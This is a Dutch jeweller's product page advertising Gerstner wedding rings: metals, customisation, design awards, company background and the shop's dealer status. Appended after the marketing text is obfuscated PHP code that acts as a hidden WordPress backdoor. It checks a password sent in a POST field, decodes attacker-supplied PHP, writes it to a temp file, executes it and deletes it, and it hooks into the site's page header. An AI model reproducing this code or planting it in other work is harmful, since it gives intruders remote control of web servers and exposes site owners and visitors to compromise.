Gerstner-trouwringen-topkwaliteit-ringen-bij-Wolters-Juweliers-Coevorden-Emmen

Gerstner trouwringen bij Wolters Juweliers Coevorden

GERSTNER TROUWRINGEN, EEN RING VOOR HET LEVEN

De trouwringen van het Duitse Gerstner staan voor een uitstekende kwaliteit in materialen, ontwerp en afwerking.  Gerstner is al ruim 150 jaar gespecialiseerd in het maken van trouwringen die perfect aansluiten bij jullie mogelijke wensen.

Naast de 'traditionele' trouwring heeft Gerstner ook een luxe lijn met opvallende designs. Gerstner onderscheid zich hiermee en geeft het merk een eigen uitstraling.

Vind bij Wolters Juweliers Coevorden jouw perfecte ring!

De trouwringen van Gerstner zijn verkrijgbaar in één kleur goud, geelgoud, witgoud en roségoud maar ook in combinaties van rosé en witgoud, van romantische vormen tot strakke lijnen. Je kunt kiezen voor een ring met of zonder diamanten en in verschillende breedte maten.

Prijzen van Gerstner trouwringen bij Wolters Juweliers

De prijzen van Gerstner trouwringen kunnen wijzigen in verband met de goudkoers en diamantprijzen. Neem voor de actuele prijzen contact met ons op.

Gerstner-kwaliteit-trouwringen-bij-Wolters-Juweliers-Coeovorden-Emmen
Gerstner-persoonlijke-trouwringen-bij-Wolters-Juweliers-Coevorden-Emmen

Persoonlijke trouwring

Elke ring kan naar eigen wens vervaardigd worden in breedte, kleur en diamanten. Welke met de hand worden gezet. De basismodellen zijn geheel aan te passen naar jullie wensen. Je kiest zelf in welke kleur(en) je de ringen laat leveren en je kan het aantal of de vorm van de diamanten aanpassen. De gouden trouwringen zijn leverbaar in 9,14 en 18 karaat goud, platina of palladium.

Trouwringenconfigurator van Gerstner

Wil je thuis alvast aan de slag met het ontwerpen van jullie trouwring? Gebruik dan deze trouwring configurator van Gerstner.

Design awards

Of het nu gaat om tijdloos klassiek, origineel speels of duidelijk avant-garde, de Gerstner collectie trouwringen is geliefd door haar harmonieus design.

En telkens opnieuw worden dit merk daarvoor beloond met felbegeerde prijzen. Zo zijn zij tussen 2000 en 2013 maar liefst 13 keer uitgeroepen tot Duitse trouwringenfabrikant van het jaar. Ook hebben zij op Baselworld 2012 (één van de grootste internationale beurzen voor horloges en sieraden,) de tweede prijs behaald in de fel omstreden Platinum Design Award. Met de koninklijke creatie "Corona" hebben ze meer dan 50 concurrenten uit China, Duitsland, Groot-Brittannië, India, Italië, Frankrijk, Japan en Zwitserland verslagen.

Gerstner-trouwring-corona-award-winnaar-Wolters-juweliers-coevorden-Emmen

Bekijk het filmpje over hoe een Gernster trouwring wordt gemaakt

Over Gerstner trouwringen

Gerstner heeft al 150 jaar ervaring in de vervaardiging van trouwringen. Gerstner is niet alleen de oudste onderneming van Duitsland, maar tevens de grootste fabrikant van de trouwringen in Duitsland. De ringen worden uitsluitend in Pforzheim vervaardigd vanaf de legering en de vervaardiging van basisringen, de complete samenstelling tot het ontwerp en het beslaan met stenen, volgens jullie individuele wensen.

Het geheel van het werk wordt gekenmerkt door een familiale samenwerking. Alle meer dan 100 werknemers dragen bij tot het succes van jullie individueel paar ringen met een ongeëvenaarde ervaring, grote zorg en veel passie.

Wolters Juweliers is officieel dealer van Gerstner trouwringen

Wolters Juweliers Coevorden is officieel dealer van Gerstner trouwringen. Wij hebben de meest elegante, betaalbare luxe ringen in onze collectie opgenomen, kom langs in onze winkel om de ringen te bekijken en te voelen. Wij helpen graag met deskundig persoonlijk advies en nemen de tijd voor jullie wensen. Ook dichtbij voor onze klanten uit Hoogeveen en Hardenberg.

Lees ook over de trouwringen van Aller Spanninga, Breuning of Collection Ruesch.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}